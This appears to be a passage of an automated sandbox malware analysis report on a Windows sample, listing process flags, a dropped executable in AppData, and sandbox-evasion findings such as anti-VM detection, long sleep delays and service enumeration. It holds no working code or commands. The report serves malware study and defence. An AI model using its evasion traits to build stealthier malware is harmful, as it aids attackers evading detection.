          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 1616, type: MEMORYSTR
          Delayed program exit found
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040E18D Sleep,ExitProcess,14_2_0040E18D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: 9250000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: A250000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: A460000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: B460000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: 9030000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: A030000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: A250000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory allocated: B250000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_004186FE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6823Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2778Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeWindow / User API: threadDelayed 509Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeWindow / User API: threadDelayed 9485Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeAPI coverage: 5.0 %
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 572Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -4611686018427385s >= -30000sJump to behavior
